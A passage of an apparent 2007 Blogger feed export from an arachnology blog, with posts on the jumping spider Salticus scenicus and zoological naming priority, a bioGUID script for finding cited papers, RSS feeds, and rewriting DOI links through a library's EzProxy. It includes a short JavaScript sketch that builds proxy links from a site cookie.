If this is so commonly done with MP3 music files, why is this taking so long for image files?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-247895766369739579?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/247895766369739579/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=247895766369739579' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/247895766369739579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/247895766369739579'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/sociology-gabbing-web-images.html' title='Sociology &amp; Gabbing Web Images'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RnYHbc3qwnI/AAAAAAAAABM/aAW1qU3rg58/s72-c/picnic2.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6725915474885323811</id><published>2007-06-13T14:54:00.000-06:00</published><updated>2007-10-25T13:38:10.871-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Salticus scenicus (Clerck, 1757)</title><content type='html'>To date, I haven't posted anything about spiders. 
This blog is at its heart about araneids after all, so I may as well get started on an interesting tidbit.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnBbh83qwlI/AAAAAAAAAA8/_XcR7mOd_O8/s1600-h/dps1.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5075657418879976018" style="FLOAT: left; CURSOR: hand; MARGIN-RIGHT: 5px" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RnBbh83qwlI/AAAAAAAAAA8/_XcR7mOd_O8/s320/dps1.jpg" border="0" /&gt;&lt;/a&gt;Here's a shot of a male &lt;em&gt;Salticus scenicus&lt;/em&gt; (Clerck, 1757). I found this guy in my kitchen, busy terrorizing my 75-pound black Labrador Retriever. I rushed to get the camera, took several shots, and tried my best to maintain a steady hand. While on knees and elbows, a large, wet tongue repeatedly sought appeasement in my left ear. Later, I submitted the image, locality, and a few comments to &lt;a href="http://www.spiderwebwatch.org/"&gt;Spider WebWatch&lt;/a&gt; because it's one of the nine species featured in that citizen science initiative. With prodding from a few folks, I designed the backend and layout for Spider WebWatch. It's a bit like a forum or a blog where participants can quickly click a spot on a Google Map, pick a date, type a free-form observation, and upload an image. Other participants can submit comments on individual observations and everything I could think of has an RSS 2.0 feed with GeoRSS and MediaRSS extensions. In other words, if you're so inclined, you can grab these feeds and images and maintain textual accreditation for these contributions. 
I also have a dynamically created Google Earth download; the locales and observations are fed from the server to your machine when called such that you don't have to download a large Google Earth file...it's a bit like the &lt;a href="http://earth.google.com/santa/"&gt;Google Earth Santa tracker&lt;/a&gt; in that regard.&lt;br /&gt;&lt;br /&gt;Anyhow, on to more interesting matters...&lt;br /&gt;&lt;br /&gt;Astute adherents to the International Code of Zoological Nomenclature will notice the date &lt;em&gt;Salticus scenicus&lt;/em&gt; was described: 1757. Directly from the ICZN is the following:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Article 3. Starting point. The date 1 January 1758 is arbitrarily fixed in this Code as the date of the starting point of zoological nomenclature.&lt;br /&gt;&lt;br /&gt;3.1.Works and names published in 1758. Two works are deemed to have been published on 1 January 1758:&lt;br /&gt;- Linnaeus's Systema Naturae, 10th Edition;&lt;br /&gt;- Clerck's Aranei Svecici.&lt;br /&gt;Names in the latter have precedence over names in the former, but names in any other work published in 1758 are deemed to have been published after the 10th Edition of Systema Naturae.&lt;br /&gt;&lt;br /&gt;3.2. Names, acts and information published before 1758. No name or nomenclatural act&lt;br /&gt;published before 1 January 1758 enters zoological nomenclature, but information(such as descriptions or illustrations) published before that date may be used. (See Article 8.7.1 for the status of names, acts and information in works published after 1757 which have been suppressed for nomenclatural purposes by&lt;br /&gt;the Commission).&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;There apparently has been plenty of bickering about Clerck's 1757 &lt;em&gt;Aranei Svecici&lt;/em&gt;, which of course was published before Linnaeus' &lt;em&gt;Systema Naturae&lt;/em&gt;. The full reference is:&lt;br /&gt;&lt;br /&gt;Clerck, C. 1757. 
&lt;em&gt;Svenska spindlar, uti sina hufvud-slågter indelte samt under några och sextio särskildte arter beskrefne och med illuminerade figurer uplyste. Stockholmiae&lt;/em&gt;, 154 pp.&lt;br /&gt;&lt;br /&gt;According to Article 3.1 of the ICZN, the authorship date for &lt;em&gt;Salticus scenicus&lt;/em&gt; ought to be 1758, yet arachnid systematists (not naming names) have fought tooth and nail to preserve full recognition/respect for Clerck's work. Clerck originally described this species as &lt;em&gt;Araneus scenicus&lt;/em&gt;; the genus &lt;em&gt;Araneus&lt;/em&gt; was a veritable trash bin for a lot of spiders. Linnaeus redescribed the species as &lt;em&gt;Aranea scenica&lt;/em&gt; in 1758, also a trash bin. So who's the authority? In case you're interested, the spiders in Linnaeus' tome are:&lt;br /&gt;&lt;br /&gt;Linnaeus, C. 1758. &lt;em&gt;Systema naturae per regna tria naturae, secundum classes, ordines, genera, species cum characteribus differentiis, synonymis, locis. Editio decima, reformata&lt;/em&gt;. Holmiae, 821 pp. (Araneae, pp. 
619-624).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6725915474885323811?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6725915474885323811/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6725915474885323811' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6725915474885323811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6725915474885323811'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/salticus-scenicus-clerck-1757.html' title='&lt;i&gt;Salticus scenicus&lt;/i&gt; (Clerck, 1757)'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RnBbh83qwlI/AAAAAAAAAA8/_XcR7mOd_O8/s72-c/dps1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3687707625005517467</id><published>2007-06-10T22:36:00.000-06:00</published><updated>2007-10-06T14:41:36.785-06:00</updated><title type='text'>Gimme That Scientific Paper! Part II</title><content type='html'>If you're wanting to make textual lists of online references more useful for visitors to your page(s) such that you can turn references like this:&lt;br /&gt;&lt;br /&gt;Work, Timothy T., David P. Shorthouse, John R. Spence, W. Jan A. Volney, David Langor. 2004. 
Stand composition and structure of the boreal mixedwood and epigaeic arthropods of the Ecosystem Management Emulating Natural Disturbance (EMEND) landbase in northwestern Alberta. &lt;i&gt;Can. J. For. Res.&lt;/i&gt; &lt;b&gt;34(2)&lt;/b&gt;: 417–430.&lt;br /&gt;&lt;br /&gt;Into this:&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span id="bioguidref_1"&gt;Work, Timothy T., David P. Shorthouse, John R. Spence, W. Jan A. Volney, David Langor. 2004. Stand composition and structure of the boreal mixedwood and epigaeic arthropods of the Ecosystem Management Emulating Natural Disturbance (EMEND) landbase in northwestern Alberta. &lt;i&gt;Can. J. For. Res.&lt;/i&gt; &lt;b&gt;34(2)&lt;/b&gt;: 417–430.&lt;/span&gt;&lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" alt="Search!" title="Search!" height="16px" width="16px" style="border:0px; margin:0px;padding:0px"&gt;&lt;/p&gt; [Doesn't work here because of Blogger constraints]&lt;br /&gt;&lt;br /&gt;Where the little magnifying glass allows visitors to your page to search for the paper without you having to maintain the links, all you need to do is download this:&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/bioGUID/bioGUID.js"&gt;http://www.canadianarachnology.org/bioGUID/bioGUID.js&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And follow the brief instructions in the JavaScript file. There's next to no additional mark-up required for the lists of papers (see &lt;a href="http://ispiders.blogspot.com/2007/06/gimme-that-scientific-paper.html#comment-4097869681642704180"&gt;Here&lt;/a&gt; in the comments section of a previous post). The script makes use of some cross-domain Flash, which requires that your domain be added to Rod Page's &lt;a href="http://bioguid.info"&gt;bioGUID&lt;/a&gt; reference parser. 
However, I included some simple php and asp examples to step around that constraint and also a link to an online file storage service where you can get all the images I used or directly accessible here: &lt;a href="http://www.box.net/shared/685i4nyxxj#1:7066241"&gt;http://www.box.net/shared/685i4nyxxj#1:7066241&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3687707625005517467?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3687707625005517467/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3687707625005517467' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3687707625005517467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3687707625005517467'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/gimme-that-scientific-paper-part-ii.html' title='Gimme That Scientific Paper! Part II'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8950331493240735674</id><published>2007-06-05T00:11:00.000-06:00</published><updated>2007-06-05T00:36:03.860-06:00</updated><title type='text'>Fun With RSS</title><content type='html'>Seems Google has finally jumped on the &lt;a href="http://search.yahoo.com/mrss"&gt;MediaRSS&lt;/a&gt; bandwagon. 
For some time now, I have been producing MediaRSS as well as simple &lt;a href="http://georss.org/"&gt;GeoRSS&lt;/a&gt; feeds from The Nearctic Spider Database and Spider WebWatch. Of note, you can paste a GeoRSS feed URL into Google Maps to get an instant mash-up. Since Google just released an &lt;a href="http://code.google.com/apis/ajaxfeeds/"&gt;AJAX Feed API&lt;/a&gt;, I thought I'd give it a shot in this blog. Here's a feed from the 10 most recent Spider WebWatch posts where contributors uploaded images with their observations:&lt;br /&gt;&lt;br /&gt;&lt;div id="slideshow" class="gss"&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;What I'd really like to see now is for &lt;a href="http://www.opensearch.org/Home"&gt;OpenSearch&lt;/a&gt; to adopt these extensions such that 3rd party, client-run search engines like &lt;a href="http://www.wrensoft.com/zoom/"&gt;ZoomSearch&lt;/a&gt; start incorporating this stuff.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8950331493240735674?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8950331493240735674/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8950331493240735674' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8950331493240735674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8950331493240735674'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/fun-with-rss.html' title='Fun With RSS'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2538133288527051610</id><published>2007-06-01T09:54:00.000-06:00</published><updated>2007-10-06T14:38:49.522-06:00</updated><title type='text'>Gimme That Scientific Paper!</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RmBGVHP62xI/AAAAAAAAAA0/rhnouiQKL1U/s1600-h/bioGUID48.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RmBGVHP62xI/AAAAAAAAAA0/rhnouiQKL1U/s320/bioGUID48.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5071130508956195602" /&gt;&lt;/a&gt;&lt;br /&gt;What irks me about references cited on web pages is that you can't directly get the PDF or at least immediately search for it unless the page author has explicitly put a link to that paper. When a page author has taken the time to construct these links, they often point to a 404 (page doesn't exist) because the link is no longer working. In the digital age, surely this sort of thing can be done more effectively. Well, thanks to Rod Page who has developed a reference parsing tool in his bioGUID suite of applications, this functionality along with some nifty Flash-based, cross-domain AJAX that I used, is now possible. For a taste of this, have a peek at the references page in &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/AllReferences.asp"&gt;The Nearctic Spider Database&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Now, what the heck is going on here? 
Glad you asked.&lt;br /&gt;&lt;br /&gt;The chain of events I think is very cool.&lt;br /&gt;&lt;br /&gt;First, I simply wrap individual references in uniquely identified and sequentially numbered identifiers and put a "holding" span at the end of these with similarly identified span elements:&lt;br /&gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;span id=&amp;quot;bioGUIDref_1&amp;quot;&amp;gt;This is the first full reference.&amp;lt;/span&amp;gt; &amp;lt;span id=&amp;quot;bioGUIDres_1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&lt;br /&gt;That's pretty easy for anyone with a rudimentary knowledge of HTML.&lt;br /&gt;&lt;br /&gt;Second, I put a reference to a JavaScript in the page header whose functions initialize when the page finishes loading. That script counts all the references with the simple mark-up shown above and puts little search icons in the holding spans. Of course this script can be hosted elsewhere and anyone can put it in their page headers.&lt;br /&gt;&lt;br /&gt;Third, I put this mark-up at the bottom of the page that initializes a Flash item, which coordinates some cross-domain search functions via Rod's reference parsing API (more on that below):&lt;br /&gt;&lt;br /&gt;&amp;lt;script type=&amp;quot;text/javascript&amp;quot;&amp;gt;FlashHelper.writeFlash();&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;So, for the end user seeing a list of references with these little search icons &lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" style="border:0px;height:16px;width:16px" alt=""&gt; stuck at the end of each of them as such:&lt;br /&gt;&lt;br /&gt;Agnarsson, I. 2004. Morphological phylogeny of cobweb spiders and their relatives (Araneae, Araneoidea, Theridiidae). &lt;em&gt;Zool. J. Linnean Soc.&lt;/em&gt; &lt;b&gt;141:&lt;/b&gt; 447-626. 
&lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" style="border:0px;height:16px;width:16px" alt=""&gt;&lt;br /&gt;&lt;br /&gt;...it's a simple matter of clicking each in turn to perform a real-time search for individual papers of interest [Disclaimer: of course the above example doesn't work here in this blog post]. If the paper is found somewhere in the ether, the icon changes either to &lt;img src="http://www.canadianarachnology.org/bioGUID/page_white_acrobat.png" style="border:0px;height:16px;width:16px" alt=""&gt; in the case of a freely available PDF (yay!), &lt;img src="http://www.canadianarachnology.org/bioGUID/world_go.png" style="border:0px;height:16px;width:16px" alt=""&gt; if the paper can be found via other means (subscription may be required), &lt;img src="http://www.canadianarachnology.org/bioGUID/error.png" style="border:0px;height:16px;width:16px" alt=""&gt; if the reference was successfully parsed and searched but nothing was found, or &lt;img src="http://www.canadianarachnology.org/bioGUID/delete.png" style="border:0px;height:16px;width:16px" alt=""&gt; if the reference was not successfully parsed and consequently a search couldn't effectively be constructed.&lt;br /&gt;&lt;br /&gt;The really awesome part of this whole system is that it is laughably easy for anyone with a basic knowledge of HTML (no complex coding required!) to duplicate these functions on their authored web pages. But let's first have some background on how this works.&lt;br /&gt;&lt;br /&gt;This cross-domain AJAX querying system uses Flash. Julien Couvreur worked with Jason Levitt (from Yahoo) to create an XMLHTTP transport that uses Flash. You can read about this in Julien's blog, &lt;a href="http://blog.monstuff.com/archives/000294.html"&gt;Curiosity is Bliss&lt;/a&gt;, where he also has a nice demo that produces search results from Yahoo's ImageSearch API using this technique. 
What Rod had to do was first get his &lt;a href="http://bioguid.info/references"&gt;reference parsing script&lt;/a&gt; to produce XML and then create a simple &lt;a href="http://www.crossdomainxml.org/"&gt;crossdomain.xml&lt;/a&gt; document and dump it in the root folder for his domain. Julien points out a potential security issue with these Flash-based cross-domain search queries so Rod at the moment only has The Canadian Arachnologists' domain in his crossdomain.xml document.&lt;br /&gt;&lt;br /&gt;An end user clicking &lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" style="border:0px;height:16px;width:16px" alt=""&gt; initiates a cross-domain request to Rod's machine. The reference is parsed in Rod's Perl script (&lt;em&gt;i.e.&lt;/em&gt; split-up into Author, Year, Title, Publication, Pages, etc. as required for &lt;a href="http://en.wikipedia.org/wiki/OpenURL"&gt;OpenURL&lt;/a&gt;) then sent off to &lt;a href="http://www.crossref.org/"&gt;CrossRef&lt;/a&gt; and elsewhere to obtain search results. This system works fantastically well for modern publications that have bought into CrossRef's DOI system (note: &lt;a href="http://hdl.handle.net/"&gt;handles&lt;/a&gt; are also working in Rod's Perl scripting) but what about all those scientific societies that produce online PDFs but haven't bought into DOIs?&lt;br /&gt;&lt;br /&gt;For smaller societies and publications like the &lt;a href="http://www.americanarachnology.org/JOA_online.html"&gt;Journal of Arachnology&lt;/a&gt;, Rod unfortunately must scrape the URLs to their digital reprints. [Aside: JoA does have DOIs, but these are issued from BioOne and an end-user accessing JoA articles via BioOne would of course be presented with a pay-per-view screen - sucky] In these cases then, the XMLHTTP system I have that sends citations to Rod's machine might return an erroneous link to a PDF if the source URL was changed &amp; Rod hadn't yet updated his listings. 
But, as long as societies agree not to mess with their URL structure, the conduit to their PDFs remains viable. This is most certainly something &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; can coordinate.&lt;br /&gt;&lt;br /&gt;Here then is a very slick little system that is easy for web page authors to implement and intuitively obvious for end-users. A potential pitfall worth mentioning is poorly constructed citations. Rod's algorithms that split a citation into its constituent bits are only as good as what goes in. In other words at my end for example, if a &lt;img src="http://www.canadianarachnology.org/bioGUID/delete.png" style="border:0px;height:16px;width:16px" alt=""&gt; icon is returned to the end-user, a digital version of the paper might exist somewhere - I just didn't construct my citation well enough for Rod's algorithm to split the bits into an OpenURL format. So, I am contemplating adding a &lt;img src="http://www.canadianarachnology.org/bioGUID/email.png" style="border:0px;height:16px;width:16px" alt=""&gt; icon to sit alongside the &lt;img src="http://www.canadianarachnology.org/bioGUID/delete.png" style="border:0px;height:16px;width:16px" alt=""&gt; icon such that an end-user who knows the paper can be found online can send me a quick note/poke to tell me that I need to re-write the citation.&lt;br /&gt;&lt;br /&gt;If you want some background on what Rod did at his end, head over to his blog where he wrote about OpenURL &lt;a href="http://iphylo.blogspot.com/2007/05/amnh-dspace-and-openurl.html"&gt;Here&lt;/a&gt; &amp; &lt;a href="http://iphylo.blogspot.com/2007/05/openurl-and-spiders.html"&gt;Here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2538133288527051610?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://ispiders.blogspot.com/feeds/2538133288527051610/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2538133288527051610' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2538133288527051610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2538133288527051610'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/gimme-that-scientific-paper.html' title='Gimme That Scientific Paper!'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RmBGVHP62xI/AAAAAAAAAA0/rhnouiQKL1U/s72-c/bioGUID48.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-139649991330502979</id><published>2007-05-25T00:55:00.000-06:00</published><updated>2007-05-27T12:20:01.191-06:00</updated><title type='text'>DOI + EzProxy</title><content type='html'>I spent a few hours yesterday learning how to do a few rudimentary things in Perl. My goal was to create something useful with all the references in The Nearctic Spider Database. It's nice to have a list of papers on the species pages I host, but is this really useful to anyone? I'd much rather have a direct link to download the paper than to see a reference list, which is fundamentally useless to me. 
Because DOIs and resolving services like &lt;a href="http://www.crossref.org"&gt;CrossRef&lt;/a&gt; have become popular now, I thought I'd at least add "PDF" icons for the relatively recent articles such that you &lt;em&gt;can&lt;/em&gt; download the paper. This is why I have been trying to learn Perl, which has a few really cool modules to parse references into their constituent, &lt;a href="http://en.wikipedia.org/wiki/OpenURL"&gt;openURL&lt;/a&gt; structure.&lt;br /&gt;&lt;br /&gt;Here's what you can do with DOIs &amp; why they're cool:&lt;br /&gt;&lt;br /&gt;Ingi Agnarsson published a massive and thorough paper in the Zoological Journal of the Linnean Society entitled, "A revision of the New World &lt;em&gt;eximius&lt;/em&gt; lineage of &lt;em&gt;Anelosimus&lt;/em&gt; (Araneae, Theridiidae) and a phylogenetic analysis using worldwide exemplars". The full reference is:&lt;br /&gt;&lt;br /&gt;Agnarsson, I. 2006. A revision of the New World &lt;em&gt;eximius&lt;/em&gt; lineage of &lt;em&gt;Anelosimus&lt;/em&gt; (Araneae, Theridiidae) and a phylogenetic analysis using worldwide exemplars. &lt;em&gt;Zool. J. Linn. Soc.&lt;/em&gt; &lt;strong&gt;146:&lt;/strong&gt; 453-593.&lt;br /&gt;&lt;br /&gt;That paper has the doi 10.1111/j.1096-3642.2006.00213.x and I store this value in the Nearctic Spider Database's references table exactly like that because it is persistent. This doi can be slapped behind http://dx.doi.org/ to give you &lt;a href="http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x&lt;/a&gt;. Now there's a ready-made, direct link to Ingi's paper right from the Nearctic Spider Database and I never have to worry about a dead link. But, there's a catch. It's a copyrighted paper so you have to log on to Blackwell Synergy's web site (somehow) to actually retrieve the full PDF and not just look at the nice title and abstract. 
If you happen to be on your institution's network, your library system is fully integrated into your internal network, and your library subscribes to the resource, then you can directly access the PDF. But what if you're using a computer at home or your institution hasn't fully integrated their library systems (requiring authentication), are we any better off with DOIs? For the end user, not really.&lt;br /&gt;&lt;br /&gt;However, in an &lt;a href="http://ispiders.blogspot.com/2007/05/monetizing-encyclopedia-of-life.html"&gt;earlier post&lt;/a&gt; where I tried to think about how &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; might generate a steady flow of income, I mentioned the use of EzProxy. Now my ideas have finally gelled.&lt;br /&gt;&lt;br /&gt;To make the PDF links in The Nearctic Spider Database really work for remote users (i.e. working at home) who belong to an institution whose library subscribes to the Zoological Journal of the Linnean Society, I'd like to be able to dynamically rewrite &lt;a href="http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x&lt;/a&gt; to &lt;a href="http://login.ezproxy.library.ualberta.ca/login?url=http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;http://login.ezproxy.library.ualberta.ca/login?url=http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x&lt;/a&gt; as is the case for the University of Alberta. Clicking that link will of course take you to the U of A library login screen prior to redirecting you to the publisher's page. Via that one minor login hiccup on your institution's library page, you can then download Ingi's paper. So how do you rewrite the URL on-the-fly? &lt;em&gt;&lt;strong&gt;A cookie!&lt;/strong&gt;&lt;/em&gt; Recipe: read member's cookie...find institution's EzProxy base URL stored there...change the doi URL. Simple as that. 
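&lt;br /&gt;&lt;br /&gt;As a rough sketch of that recipe in JavaScript, the rewrite might look something like the following. The cookie name "ezproxy_base" and the three helper function names are assumptions made up for illustration, not anything The Nearctic Spider Database actually uses. The only things taken from this post are the dx.doi.org resolver prefix and the shape of the EzProxy login URL.&lt;br /&gt;&lt;br /&gt;
&lt;pre&gt;
```javascript
// Hypothetical sketch: turn a stored DOI into a link, routed through a
// member's EzProxy login when a base URL is found in their cookie.
// ASSUMPTION: the cookie is named "ezproxy_base" and holds a URL-encoded
// base such as http://login.ezproxy.library.ualberta.ca/login?url=

const DOI_RESOLVER = "http://dx.doi.org/";

// Build the persistent resolver link from a bare DOI string.
function doiToUrl(doi) {
  return DOI_RESOLVER + doi.trim();
}

// Pull one named value out of a document.cookie-style string.
// Returns null when the cookie is absent.
function readCookie(cookieString, name) {
  for (const pair of cookieString.split(";")) {
    const [key, ...rest] = pair.trim().split("=");
    if (key === name) {
      // Re-join on "=" in case the stored value itself contains one.
      return decodeURIComponent(rest.join("="));
    }
  }
  return null;
}

// Prefix the DOI link with the EzProxy base URL if the cookie has one;
// otherwise fall back to the plain resolver link.
function rewriteDoiLink(doi, cookieString) {
  const base = readCookie(cookieString, "ezproxy_base");
  const target = doiToUrl(doi);
  return base ? base + target : target;
}
```
&lt;/pre&gt;
In a browser you would pass document.cookie as the second argument. With no cookie present the plain dx.doi.org link comes back unchanged, so visitors without a stored EzProxy base URL still land on the publisher's abstract page.&lt;br /&gt;&lt;br /&gt;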
Alternatively, the EzProxy base URL could be stored in a table in the server's database in the event an institution changes its EzProxy settings. You probably wouldn't want frustrated users trying to get things to work with a half-baked cookie in their cache. But (there's always a but), it would be quite unreasonable for me to store all these EzProxy base URLs in The Nearctic Spider Database. If there was a web service I could use that maintained such lists, then I would most certainly use it. I have no money, but The Encyclopedia of Life does! Folks leading EoL are searching for a way to encourage systematists to vet species pages, so here's a really nice way to give something in return: direct links to PDF downloads. The subscription fee charged to institutions would be to maintain working EzProxy base URLs (or similar base proxy URLs to coordinate this) in the EoL database. Now that would be cool.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Post Update&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Apparently, I haven't been the only one thinking about these sorts of remote authentication issues. There's a blog called "&lt;a href="http://distlib.blogs.com"&gt;The Distant Librarian&lt;/a&gt;" where these exact same ideas have been kicked around, though with use in Google Scholar (&lt;a href="http://distlib.blogs.com/distlib/2004/11/how_to_make_goo.html"&gt;1&lt;/a&gt;,&lt;a href="http://distlib.blogs.com/distlib/2004/11/google_scholar__1.html"&gt;2&lt;/a&gt;)...same principle. So, it appears that The Encyclopedia of Life can be added to institutions' EzProxy config to allow direct links to the PDF downloads. Also of interest is &lt;a href="http://rsinger.library.gatech.edu/localizer/localizer.html"&gt;WAG the Dog PHP localizer&lt;/a&gt; (also available on &lt;a href="http://sourceforge.net/projects/gslocal/"&gt;SourceForge&lt;/a&gt;). Wouldn't you know it, Peter Binkley was one of the developers of WAG. He's a librarian at my own institution! 
I'll have to go have a coffee with him.&lt;br /&gt;&lt;br /&gt;I also discovered a Firefox extension under development by a number of libraries called &lt;a href="http://www.libx.org/"&gt;LibX&lt;/a&gt;, which does magic, client-side URL re-writing for DOIs, has Google Scholar integration, &amp; works with EzProxy. Now all we need is buy-in by all libraries for this &amp; for IE/Safari folks to use FF. If you absolutely can't wait for librarians in your institution to make a LibX FF extension, you can probably kludge together an approximation of its functionality using &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/748"&gt;Greasemonkey&lt;/a&gt; and Jesse Ruderman's &lt;a href="http://www.squarefree.com/2005/05/22/autolink/"&gt;autolink script&lt;/a&gt;, which you can adjust (if you're familiar with regexp) to suit the way DOIs are typically presented on web sites.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-139649991330502979?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/139649991330502979/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 